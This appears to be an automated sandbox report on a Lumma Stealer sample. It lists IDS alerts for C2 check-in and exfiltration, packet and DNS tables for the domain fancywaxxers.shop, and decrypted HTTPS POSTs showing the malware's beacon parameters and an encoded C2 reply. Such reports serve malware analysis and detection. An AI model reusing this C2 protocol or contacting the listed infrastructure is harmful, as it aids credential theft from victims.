                                                                                      2024-12-31T09:43:03.125539+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449730104.21.112.1443TCP
                                                                                      2024-12-31T09:43:03.623054+01002058657ET MALWARE Observed Win32/Lumma Stealer Related Domain (fancywaxxers .shop in TLS SNI)1192.168.2.449731104.21.112.1443TCP
                                                                                      2024-12-31T09:43:03.623054+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449731104.21.112.1443TCP
                                                                                      2024-12-31T09:43:04.093969+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.449731104.21.112.1443TCP
                                                                                      2024-12-31T09:43:04.093969+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449731104.21.112.1443TCP
                                                                                      2024-12-31T09:43:04.830639+01002058657ET MALWARE Observed Win32/Lumma Stealer Related Domain (fancywaxxers .shop in TLS SNI)1192.168.2.449732104.21.112.1443TCP
                                                                                      2024-12-31T09:43:04.830639+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449732104.21.112.1443TCP
                                                                                      2024-12-31T09:43:06.073842+01002058657ET MALWARE Observed Win32/Lumma Stealer Related Domain (fancywaxxers .shop in TLS SNI)1192.168.2.449733104.21.112.1443TCP
                                                                                      2024-12-31T09:43:06.073842+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449733104.21.112.1443TCP
                                                                                      2024-12-31T09:43:07.598382+01002058657ET MALWARE Observed Win32/Lumma Stealer Related Domain (fancywaxxers .shop in TLS SNI)1192.168.2.449734104.21.112.1443TCP
                                                                                      2024-12-31T09:43:07.598382+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449734104.21.112.1443TCP
                                                                                      2024-12-31T09:43:09.153886+01002058657ET MALWARE Observed Win32/Lumma Stealer Related Domain (fancywaxxers .shop in TLS SNI)1192.168.2.449735104.21.112.1443TCP
                                                                                      2024-12-31T09:43:09.153886+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449735104.21.112.1443TCP
                                                                                      2024-12-31T09:43:09.582681+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.449735104.21.112.1443TCP
                                                                                      2024-12-31T09:43:10.488984+01002058657ET MALWARE Observed Win32/Lumma Stealer Related Domain (fancywaxxers .shop in TLS SNI)1192.168.2.449736104.21.112.1443TCP
                                                                                      2024-12-31T09:43:10.488984+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449736104.21.112.1443TCP
                                                                                      2024-12-31T09:43:14.085649+01002058657ET MALWARE Observed Win32/Lumma Stealer Related Domain (fancywaxxers .shop in TLS SNI)1192.168.2.449737104.21.112.1443TCP
                                                                                      2024-12-31T09:43:14.085649+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449737104.21.112.1443TCP

                                                                                      Network Port Distribution

                                                                                      TCP Packets

                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                      Dec 31, 2024 09:43:02.146306038 CET49730443192.168.2.4104.21.112.1
                                                                                      Dec 31, 2024 09:43:02.146327972 CET44349730104.21.112.1192.168.2.4
                                                                                      Dec 31, 2024 09:43:02.146399021 CET49730443192.168.2.4104.21.112.1
                                                                                      Dec 31, 2024 09:43:02.149229050 CET49730443192.168.2.4104.21.112.1
                                                                                      Dec 31, 2024 09:43:02.149241924 CET44349730104.21.112.1192.168.2.4
                                                                                      Dec 31, 2024 09:43:02.644726038 CET44349730104.21.112.1192.168.2.4
                                                                                      Dec 31, 2024 09:43:02.644819975 CET49730443192.168.2.4104.21.112.1
                                                                                      Dec 31, 2024 09:43:02.648550034 CET49730443192.168.2.4104.21.112.1
                                                                                      Dec 31, 2024 09:43:02.648557901 CET44349730104.21.112.1192.168.2.4
                                                                                      Dec 31, 2024 09:43:02.648838043 CET44349730104.21.112.1192.168.2.4
                                                                                      Dec 31, 2024 09:43:02.694610119 CET49730443192.168.2.4104.21.112.1
                                                                                      Dec 31, 2024 09:43:02.706130028 CET49730443192.168.2.4104.21.112.1
                                                                                      Dec 31, 2024 09:43:02.706163883 CET49730443192.168.2.4104.21.112.1
                                                                                      Dec 31, 2024 09:43:02.706424952 CET44349730104.21.112.1192.168.2.4
                                                                                      Dec 31, 2024 09:43:03.125541925 CET44349730104.21.112.1192.168.2.4
                                                                                      Dec 31, 2024 09:43:03.125648975 CET44349730104.21.112.1192.168.2.4
                                                                                      Dec 31, 2024 09:43:03.125703096 CET49730443192.168.2.4104.21.112.1
                                                                                      Dec 31, 2024 09:43:03.127253056 CET49730443192.168.2.4104.21.112.1
                                                                                      Dec 31, 2024 09:43:03.127269983 CET44349730104.21.112.1192.168.2.4
                                                                                      Dec 31, 2024 09:43:03.127284050 CET49730443192.168.2.4104.21.112.1
                                                                                      Dec 31, 2024 09:43:03.127289057 CET44349730104.21.112.1192.168.2.4
                                                                                      Dec 31, 2024 09:43:03.136055946 CET49731443192.168.2.4104.21.112.1
                                                                                      Dec 31, 2024 09:43:03.136113882 CET44349731104.21.112.1192.168.2.4
                                                                                      Dec 31, 2024 09:43:03.136214018 CET49731443192.168.2.4104.21.112.1
                                                                                      Dec 31, 2024 09:43:03.136496067 CET49731443192.168.2.4104.21.112.1
                                                                                      Dec 31, 2024 09:43:03.136517048 CET44349731104.21.112.1192.168.2.4
                                                                                      Dec 31, 2024 09:43:03.622970104 CET44349731104.21.112.1192.168.2.4
                                                                                      Dec 31, 2024 09:43:03.623054028 CET49731443192.168.2.4104.21.112.1
                                                                                      Dec 31, 2024 09:43:03.636332989 CET49731443192.168.2.4104.21.112.1
                                                                                      Dec 31, 2024 09:43:03.636360884 CET44349731104.21.112.1192.168.2.4
                                                                                      Dec 31, 2024 09:43:03.636586905 CET44349731104.21.112.1192.168.2.4
                                                                                      Dec 31, 2024 09:43:03.637783051 CET49731443192.168.2.4104.21.112.1
                                                                                      Dec 31, 2024 09:43:03.637826920 CET49731443192.168.2.4104.21.112.1
                                                                                      Dec 31, 2024 09:43:03.637860060 CET44349731104.21.112.1192.168.2.4
                                                                                      Dec 31, 2024 09:43:04.093961954 CET44349731104.21.112.1192.168.2.4
                                                                                      Dec 31, 2024 09:43:04.094017982 CET44349731104.21.112.1192.168.2.4
                                                                                      Dec 31, 2024 09:43:04.094053030 CET44349731104.21.112.1192.168.2.4
                                                                                      Dec 31, 2024 09:43:04.094085932 CET44349731104.21.112.1192.168.2.4
                                                                                      Dec 31, 2024 09:43:04.094120979 CET44349731104.21.112.1192.168.2.4
                                                                                      Dec 31, 2024 09:43:04.094145060 CET49731443192.168.2.4104.21.112.1
                                                                                      Dec 31, 2024 09:43:04.094147921 CET44349731104.21.112.1192.168.2.4
                                                                                      Dec 31, 2024 09:43:04.094145060 CET49731443192.168.2.4104.21.112.1
                                                                                      Dec 31, 2024 09:43:04.094172955 CET44349731104.21.112.1192.168.2.4
                                                                                      Dec 31, 2024 09:43:04.094192028 CET49731443192.168.2.4104.21.112.1
                                                                                      Dec 31, 2024 09:43:04.094238997 CET44349731104.21.112.1192.168.2.4
                                                                                      Dec 31, 2024 09:43:04.094281912 CET49731443192.168.2.4104.21.112.1
                                                                                      Dec 31, 2024 09:43:04.094290972 CET44349731104.21.112.1192.168.2.4
                                                                                      Dec 31, 2024 09:43:04.094639063 CET44349731104.21.112.1192.168.2.4
                                                                                      Dec 31, 2024 09:43:04.094682932 CET49731443192.168.2.4104.21.112.1
                                                                                      Dec 31, 2024 09:43:04.094691992 CET44349731104.21.112.1192.168.2.4
                                                                                      Dec 31, 2024 09:43:04.098638058 CET44349731104.21.112.1192.168.2.4
                                                                                      Dec 31, 2024 09:43:04.098709106 CET49731443192.168.2.4104.21.112.1
                                                                                      Dec 31, 2024 09:43:04.098726988 CET44349731104.21.112.1192.168.2.4
                                                                                      Dec 31, 2024 09:43:04.147797108 CET49731443192.168.2.4104.21.112.1
                                                                                      Dec 31, 2024 09:43:04.184248924 CET44349731104.21.112.1192.168.2.4
                                                                                      Dec 31, 2024 09:43:04.184326887 CET44349731104.21.112.1192.168.2.4
                                                                                      Dec 31, 2024 09:43:04.184355021 CET44349731104.21.112.1192.168.2.4
                                                                                      Dec 31, 2024 09:43:04.184372902 CET49731443192.168.2.4104.21.112.1
                                                                                      Dec 31, 2024 09:43:04.184390068 CET44349731104.21.112.1192.168.2.4
                                                                                      Dec 31, 2024 09:43:04.184434891 CET49731443192.168.2.4104.21.112.1
                                                                                      Dec 31, 2024 09:43:04.184442997 CET44349731104.21.112.1192.168.2.4
                                                                                      Dec 31, 2024 09:43:04.184458971 CET44349731104.21.112.1192.168.2.4
                                                                                      Dec 31, 2024 09:43:04.184499979 CET49731443192.168.2.4104.21.112.1
                                                                                      Dec 31, 2024 09:43:04.186335087 CET49731443192.168.2.4104.21.112.1
                                                                                      Dec 31, 2024 09:43:04.186357021 CET44349731104.21.112.1192.168.2.4
                                                                                      Dec 31, 2024 09:43:04.186372995 CET49731443192.168.2.4104.21.112.1
                                                                                      Dec 31, 2024 09:43:04.186379910 CET44349731104.21.112.1192.168.2.4
                                                                                      Dec 31, 2024 09:43:04.348849058 CET49732443192.168.2.4104.21.112.1
                                                                                      Dec 31, 2024 09:43:04.348891973 CET44349732104.21.112.1192.168.2.4
                                                                                      Dec 31, 2024 09:43:04.348959923 CET49732443192.168.2.4104.21.112.1
                                                                                      Dec 31, 2024 09:43:04.349309921 CET49732443192.168.2.4104.21.112.1
                                                                                      Dec 31, 2024 09:43:04.349325895 CET44349732104.21.112.1192.168.2.4
                                                                                      Dec 31, 2024 09:43:04.830569029 CET44349732104.21.112.1192.168.2.4
                                                                                      Dec 31, 2024 09:43:04.830638885 CET49732443192.168.2.4104.21.112.1
                                                                                      Dec 31, 2024 09:43:04.832696915 CET49732443192.168.2.4104.21.112.1
                                                                                      Dec 31, 2024 09:43:04.832709074 CET44349732104.21.112.1192.168.2.4
                                                                                      Dec 31, 2024 09:43:04.832942963 CET44349732104.21.112.1192.168.2.4
                                                                                      Dec 31, 2024 09:43:04.834748030 CET49732443192.168.2.4104.21.112.1
                                                                                      Dec 31, 2024 09:43:04.834981918 CET49732443192.168.2.4104.21.112.1
                                                                                      Dec 31, 2024 09:43:04.835017920 CET44349732104.21.112.1192.168.2.4
                                                                                      Dec 31, 2024 09:43:04.835084915 CET49732443192.168.2.4104.21.112.1
                                                                                      Dec 31, 2024 09:43:04.835094929 CET44349732104.21.112.1192.168.2.4
                                                                                      Dec 31, 2024 09:43:05.512733936 CET44349732104.21.112.1192.168.2.4
                                                                                      Dec 31, 2024 09:43:05.512835979 CET44349732104.21.112.1192.168.2.4
                                                                                      Dec 31, 2024 09:43:05.512895107 CET49732443192.168.2.4104.21.112.1
                                                                                      Dec 31, 2024 09:43:05.513098001 CET49732443192.168.2.4104.21.112.1
                                                                                      Dec 31, 2024 09:43:05.513114929 CET44349732104.21.112.1192.168.2.4
                                                                                      Dec 31, 2024 09:43:05.608546019 CET49733443192.168.2.4104.21.112.1
                                                                                      Dec 31, 2024 09:43:05.608589888 CET44349733104.21.112.1192.168.2.4
                                                                                      Dec 31, 2024 09:43:05.608679056 CET49733443192.168.2.4104.21.112.1
                                                                                      Dec 31, 2024 09:43:05.608989000 CET49733443192.168.2.4104.21.112.1
                                                                                      Dec 31, 2024 09:43:05.609000921 CET44349733104.21.112.1192.168.2.4
                                                                                      Dec 31, 2024 09:43:06.073565960 CET44349733104.21.112.1192.168.2.4
                                                                                      Dec 31, 2024 09:43:06.073842049 CET49733443192.168.2.4104.21.112.1
                                                                                      Dec 31, 2024 09:43:06.075177908 CET49733443192.168.2.4104.21.112.1
                                                                                      Dec 31, 2024 09:43:06.075185061 CET44349733104.21.112.1192.168.2.4
                                                                                      Dec 31, 2024 09:43:06.075422049 CET44349733104.21.112.1192.168.2.4
                                                                                      Dec 31, 2024 09:43:06.076703072 CET49733443192.168.2.4104.21.112.1
                                                                                      Dec 31, 2024 09:43:06.076836109 CET49733443192.168.2.4104.21.112.1
                                                                                      Dec 31, 2024 09:43:06.076870918 CET44349733104.21.112.1192.168.2.4
                                                                                      Dec 31, 2024 09:43:06.818950891 CET44349733104.21.112.1192.168.2.4
                                                                                      Dec 31, 2024 09:43:06.819060087 CET44349733104.21.112.1192.168.2.4
                                                                                      Dec 31, 2024 09:43:06.819103003 CET49733443192.168.2.4104.21.112.1
                                                                                      Dec 31, 2024 09:43:06.819237947 CET49733443192.168.2.4104.21.112.1
                                                                                      Dec 31, 2024 09:43:06.819256067 CET44349733104.21.112.1192.168.2.4
                                                                                      Dec 31, 2024 09:43:07.116242886 CET49734443192.168.2.4104.21.112.1
                                                                                      Dec 31, 2024 09:43:07.116281033 CET44349734104.21.112.1192.168.2.4
                                                                                      Dec 31, 2024 09:43:07.116358995 CET49734443192.168.2.4104.21.112.1
                                                                                      Dec 31, 2024 09:43:07.116982937 CET49734443192.168.2.4104.21.112.1
                                                                                      Dec 31, 2024 09:43:07.116997957 CET44349734104.21.112.1192.168.2.4
                                                                                      Dec 31, 2024 09:43:07.598269939 CET44349734104.21.112.1192.168.2.4
                                                                                      Dec 31, 2024 09:43:07.598381996 CET49734443192.168.2.4104.21.112.1
                                                                                      Dec 31, 2024 09:43:07.599771976 CET49734443192.168.2.4104.21.112.1
                                                                                      Dec 31, 2024 09:43:07.599783897 CET44349734104.21.112.1192.168.2.4
                                                                                      Dec 31, 2024 09:43:07.600009918 CET44349734104.21.112.1192.168.2.4
                                                                                      Dec 31, 2024 09:43:07.601330042 CET49734443192.168.2.4104.21.112.1
                                                                                      Dec 31, 2024 09:43:07.601471901 CET49734443192.168.2.4104.21.112.1
                                                                                      Dec 31, 2024 09:43:07.601507902 CET44349734104.21.112.1192.168.2.4
                                                                                      Dec 31, 2024 09:43:07.601569891 CET49734443192.168.2.4104.21.112.1
                                                                                      Dec 31, 2024 09:43:07.601577997 CET44349734104.21.112.1192.168.2.4
                                                                                      Dec 31, 2024 09:43:08.215550900 CET44349734104.21.112.1192.168.2.4
                                                                                      Dec 31, 2024 09:43:08.215647936 CET44349734104.21.112.1192.168.2.4
                                                                                      Dec 31, 2024 09:43:08.215769053 CET49734443192.168.2.4104.21.112.1
                                                                                      Dec 31, 2024 09:43:08.216027975 CET49734443192.168.2.4104.21.112.1
                                                                                      Dec 31, 2024 09:43:08.216042042 CET44349734104.21.112.1192.168.2.4
                                                                                      Dec 31, 2024 09:43:08.622359991 CET49735443192.168.2.4104.21.112.1
                                                                                      Dec 31, 2024 09:43:08.622421026 CET44349735104.21.112.1192.168.2.4
                                                                                      Dec 31, 2024 09:43:08.622486115 CET49735443192.168.2.4104.21.112.1
                                                                                      Dec 31, 2024 09:43:08.623651981 CET49735443192.168.2.4104.21.112.1
                                                                                      Dec 31, 2024 09:43:08.623668909 CET44349735104.21.112.1192.168.2.4
                                                                                      Dec 31, 2024 09:43:09.153768063 CET44349735104.21.112.1192.168.2.4
                                                                                      Dec 31, 2024 09:43:09.153886080 CET49735443192.168.2.4104.21.112.1
                                                                                      Dec 31, 2024 09:43:09.155348063 CET49735443192.168.2.4104.21.112.1
                                                                                      Dec 31, 2024 09:43:09.155359030 CET44349735104.21.112.1192.168.2.4
                                                                                      Dec 31, 2024 09:43:09.155587912 CET44349735104.21.112.1192.168.2.4
                                                                                      Dec 31, 2024 09:43:09.161539078 CET49735443192.168.2.4104.21.112.1
                                                                                      Dec 31, 2024 09:43:09.161652088 CET49735443192.168.2.4104.21.112.1
                                                                                      Dec 31, 2024 09:43:09.161658049 CET44349735104.21.112.1192.168.2.4
                                                                                      Dec 31, 2024 09:43:09.582680941 CET44349735104.21.112.1192.168.2.4
                                                                                      Dec 31, 2024 09:43:09.582798958 CET44349735104.21.112.1192.168.2.4
                                                                                      Dec 31, 2024 09:43:09.582930088 CET49735443192.168.2.4104.21.112.1
                                                                                      Dec 31, 2024 09:43:09.583129883 CET49735443192.168.2.4104.21.112.1
                                                                                      Dec 31, 2024 09:43:09.583157063 CET44349735104.21.112.1192.168.2.4
                                                                                      Dec 31, 2024 09:43:10.032959938 CET49736443192.168.2.4104.21.112.1
                                                                                      Dec 31, 2024 09:43:10.032998085 CET44349736104.21.112.1192.168.2.4
                                                                                      Dec 31, 2024 09:43:10.033090115 CET49736443192.168.2.4104.21.112.1
                                                                                      Dec 31, 2024 09:43:10.033411980 CET49736443192.168.2.4104.21.112.1
                                                                                      Dec 31, 2024 09:43:10.033421993 CET44349736104.21.112.1192.168.2.4
                                                                                      Dec 31, 2024 09:43:10.488886118 CET44349736104.21.112.1192.168.2.4
                                                                                      Dec 31, 2024 09:43:10.488984108 CET49736443192.168.2.4104.21.112.1
                                                                                      Dec 31, 2024 09:43:10.490731955 CET49736443192.168.2.4104.21.112.1
                                                                                      Dec 31, 2024 09:43:10.490756989 CET44349736104.21.112.1192.168.2.4
                                                                                      Dec 31, 2024 09:43:10.490998983 CET44349736104.21.112.1192.168.2.4
                                                                                      Dec 31, 2024 09:43:10.492352962 CET49736443192.168.2.4104.21.112.1
                                                                                      Dec 31, 2024 09:43:10.493355036 CET49736443192.168.2.4104.21.112.1
                                                                                      Dec 31, 2024 09:43:10.493395090 CET44349736104.21.112.1192.168.2.4
                                                                                      Dec 31, 2024 09:43:10.493494987 CET49736443192.168.2.4104.21.112.1
                                                                                      Dec 31, 2024 09:43:10.493525028 CET44349736104.21.112.1192.168.2.4
                                                                                      Dec 31, 2024 09:43:10.493629932 CET49736443192.168.2.4104.21.112.1
                                                                                      Dec 31, 2024 09:43:10.493674994 CET44349736104.21.112.1192.168.2.4
                                                                                      Dec 31, 2024 09:43:10.493802071 CET49736443192.168.2.4104.21.112.1
                                                                                      Dec 31, 2024 09:43:10.493835926 CET44349736104.21.112.1192.168.2.4
                                                                                      Dec 31, 2024 09:43:10.493980885 CET49736443192.168.2.4104.21.112.1
                                                                                      Dec 31, 2024 09:43:10.494012117 CET44349736104.21.112.1192.168.2.4
                                                                                      Dec 31, 2024 09:43:10.494151115 CET49736443192.168.2.4104.21.112.1
                                                                                      Dec 31, 2024 09:43:10.494177103 CET44349736104.21.112.1192.168.2.4
                                                                                      Dec 31, 2024 09:43:10.494187117 CET49736443192.168.2.4104.21.112.1
                                                                                      Dec 31, 2024 09:43:10.494201899 CET44349736104.21.112.1192.168.2.4
                                                                                      Dec 31, 2024 09:43:10.494327068 CET49736443192.168.2.4104.21.112.1
                                                                                      Dec 31, 2024 09:43:10.494349003 CET44349736104.21.112.1192.168.2.4
                                                                                      Dec 31, 2024 09:43:10.494374990 CET49736443192.168.2.4104.21.112.1
                                                                                      Dec 31, 2024 09:43:10.494507074 CET49736443192.168.2.4104.21.112.1
                                                                                      Dec 31, 2024 09:43:10.494537115 CET49736443192.168.2.4104.21.112.1
                                                                                      Dec 31, 2024 09:43:10.502316952 CET44349736104.21.112.1192.168.2.4
                                                                                      Dec 31, 2024 09:43:10.502487898 CET49736443192.168.2.4104.21.112.1
                                                                                      Dec 31, 2024 09:43:10.502533913 CET44349736104.21.112.1192.168.2.4
                                                                                      Dec 31, 2024 09:43:10.502616882 CET49736443192.168.2.4104.21.112.1
                                                                                      Dec 31, 2024 09:43:10.502727032 CET49736443192.168.2.4104.21.112.1
                                                                                      Dec 31, 2024 09:43:10.503879070 CET44349736104.21.112.1192.168.2.4
                                                                                      Dec 31, 2024 09:43:13.801944971 CET44349736104.21.112.1192.168.2.4
                                                                                      Dec 31, 2024 09:43:13.802059889 CET44349736104.21.112.1192.168.2.4
                                                                                      Dec 31, 2024 09:43:13.802148104 CET49736443192.168.2.4104.21.112.1
                                                                                      Dec 31, 2024 09:43:13.802309036 CET49736443192.168.2.4104.21.112.1
                                                                                      Dec 31, 2024 09:43:13.802330017 CET44349736104.21.112.1192.168.2.4
                                                                                      Dec 31, 2024 09:43:13.835690975 CET49737443192.168.2.4104.21.112.1
                                                                                      Dec 31, 2024 09:43:13.835747957 CET44349737104.21.112.1192.168.2.4
                                                                                      Dec 31, 2024 09:43:13.835834026 CET49737443192.168.2.4104.21.112.1
                                                                                      Dec 31, 2024 09:43:13.836182117 CET49737443192.168.2.4104.21.112.1
                                                                                      Dec 31, 2024 09:43:13.836199045 CET44349737104.21.112.1192.168.2.4
                                                                                      Dec 31, 2024 09:43:14.085649014 CET49737443192.168.2.4104.21.112.1

                                                                                      UDP Packets

                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                      Dec 31, 2024 09:43:02.129168987 CET5028853192.168.2.41.1.1.1
                                                                                      Dec 31, 2024 09:43:02.141824007 CET53502881.1.1.1192.168.2.4

                                                                                      DNS Queries

                                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                      Dec 31, 2024 09:43:02.129168987 CET192.168.2.41.1.1.10x30eStandard query (0)fancywaxxers.shopA (IP address)IN (0x0001)false

                                                                                      DNS Answers

                                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                      Dec 31, 2024 09:43:02.141824007 CET1.1.1.1192.168.2.40x30eNo error (0)fancywaxxers.shop104.21.112.1A (IP address)IN (0x0001)false
                                                                                      Dec 31, 2024 09:43:02.141824007 CET1.1.1.1192.168.2.40x30eNo error (0)fancywaxxers.shop104.21.16.1A (IP address)IN (0x0001)false
                                                                                      Dec 31, 2024 09:43:02.141824007 CET1.1.1.1192.168.2.40x30eNo error (0)fancywaxxers.shop104.21.48.1A (IP address)IN (0x0001)false
                                                                                      Dec 31, 2024 09:43:02.141824007 CET1.1.1.1192.168.2.40x30eNo error (0)fancywaxxers.shop104.21.32.1A (IP address)IN (0x0001)false
                                                                                      Dec 31, 2024 09:43:02.141824007 CET1.1.1.1192.168.2.40x30eNo error (0)fancywaxxers.shop104.21.96.1A (IP address)IN (0x0001)false
                                                                                      Dec 31, 2024 09:43:02.141824007 CET1.1.1.1192.168.2.40x30eNo error (0)fancywaxxers.shop104.21.80.1A (IP address)IN (0x0001)false
                                                                                      Dec 31, 2024 09:43:02.141824007 CET1.1.1.1192.168.2.40x30eNo error (0)fancywaxxers.shop104.21.64.1A (IP address)IN (0x0001)false

                                                                                      HTTP Request Dependency Graph

                                                                                      • fancywaxxers.shop

                                                                                      HTTPS Proxied Packets

                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      0192.168.2.449730104.21.112.14436940C:\Users\user\Desktop\x6VtGfW26X.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-12-31 08:43:02 UTC264OUTPOST /api HTTP/1.1
                                                                                      Connection: Keep-Alive
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                      Content-Length: 8
                                                                                      Host: fancywaxxers.shop
                                                                                      2024-12-31 08:43:02 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                      Data Ascii: act=life
                                                                                      2024-12-31 08:43:03 UTC1131INHTTP/1.1 200 OK
                                                                                      Date: Tue, 31 Dec 2024 08:43:03 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: close
                                                                                      Set-Cookie: PHPSESSID=tnam0vvtdue50j6mvidh3pgf8k; expires=Sat, 26 Apr 2025 02:29:41 GMT; Max-Age=9999999; path=/
                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                      Pragma: no-cache
                                                                                      X-Frame-Options: DENY
                                                                                      X-Content-Type-Options: nosniff
                                                                                      X-XSS-Protection: 1; mode=block
                                                                                      cf-cache-status: DYNAMIC
                                                                                      vary: accept-encoding
                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=v3mnXlXiL9ur%2FhDnYlYazgaA2cG1KXbknmBbywrmJTQSOjrNGAPRtdZ%2BKWfqOGfL4Sf%2Fsb3ZszBjgjvD2GMqOA3rfCtFjpJerhXzquH1uQo06GYgLk4WMrzsixUkP8Y7P%2BxD4g%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                      Server: cloudflare
                                                                                      CF-RAY: 8fa8face3e2dc34f-EWR
                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1474&min_rtt=1464&rtt_var=570&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2844&recv_bytes=908&delivery_rate=1885087&cwnd=181&unsent_bytes=0&cid=15b705e660dc086d&ts=499&x=0"
                                                                                      2024-12-31 08:43:03 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                      Data Ascii: 2ok
                                                                                      2024-12-31 08:43:03 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                      Data Ascii: 0


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      1192.168.2.449731104.21.112.14436940C:\Users\user\Desktop\x6VtGfW26X.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-12-31 08:43:03 UTC265OUTPOST /api HTTP/1.1
                                                                                      Connection: Keep-Alive
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                      Content-Length: 47
                                                                                      Host: fancywaxxers.shop
                                                                                      2024-12-31 08:43:03 UTC47OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 26 6a 3d
                                                                                      Data Ascii: act=recive_message&ver=4.0&lid=PsFKDg--pablo&j=
                                                                                      2024-12-31 08:43:04 UTC1146INHTTP/1.1 200 OK
                                                                                      Date: Tue, 31 Dec 2024 08:43:04 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: close
                                                                                      Set-Cookie: PHPSESSID=k8266q6a09er3hri1s9142e8uc; expires=Sat, 26 Apr 2025 02:29:42 GMT; Max-Age=9999999; path=/
                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                      Pragma: no-cache
                                                                                      X-Frame-Options: DENY
                                                                                      X-Content-Type-Options: nosniff
                                                                                      X-XSS-Protection: 1; mode=block
                                                                                      cf-cache-status: DYNAMIC
                                                                                      vary: accept-encoding
                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JXSlorGqqX547QtIzdzh%2FgLr%2FD6V9X718vfbAjxR2YVXrqm6hVDiPzV%2F44%2FuFgFVDXfrd%2BT1V%2BgfDWEevHw0pV9m%2FY3%2FPw%2B2erlppZf9704RdtvTR%2BqHc%2F4CYkJng8kpcz57jA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                      Server: cloudflare
                                                                                      CF-RAY: 8fa8fad43c8a0f5b-EWR
                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=2198&min_rtt=1583&rtt_var=1033&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2843&recv_bytes=948&delivery_rate=1844598&cwnd=221&unsent_bytes=0&cid=4eb9d6885c926bd0&ts=477&x=0"
                                                                                      2024-12-31 08:43:04 UTC223INData Raw: 31 63 61 37 0d 0a 63 30 66 56 30 4f 53 70 37 72 54 6e 4c 4d 71 77 74 4b 61 33 68 78 56 6f 79 74 36 41 38 59 4e 31 2b 57 33 35 4e 56 4f 49 65 47 51 49 5a 61 50 79 33 70 33 43 6c 70 52 4a 36 49 72 41 31 4d 4c 69 4f 55 71 72 75 71 4c 4c 35 52 53 56 48 70 77 5a 63 66 34 56 52 6b 6b 68 74 4c 79 58 7a 4d 4b 57 67 6c 54 6f 69 75 2f 64 6c 65 4a 37 53 76 44 38 35 5a 76 68 46 4a 55 50 6d 46 34 38 2b 42 51 48 47 79 75 79 75 49 48 4b 69 74 57 4c 51 61 2f 56 30 63 66 64 36 58 77 46 6f 72 4f 69 33 61 45 51 67 30 2f 44 46 78 37 74 44 41 55 2b 4a 71 61 37 78 74 54 43 7a 38 56 4a 70 4a 4b 4f 68 4e 62 69 64 77 53 73 75 75 75 5a 36 78 32 64 44 70 31 66 49 2b 45 65 44 42 73 6c 73
                                                                                      Data Ascii: 1ca7c0fV0OSp7rTnLMqwtKa3hxVoyt6A8YN1+W35NVOIeGQIZaPy3p3ClpRJ6IrA1MLiOUqruqLL5RSVHpwZcf4VRkkhtLyXzMKWglToiu/dleJ7SvD85ZvhFJUPmF48+BQHGyuyuIHKitWLQa/V0cfd6XwForOi3aEQg0/DFx7tDAU+Jqa7xtTCz8VJpJKOhNbidwSsuuuZ6x2dDp1fI+EeDBsls
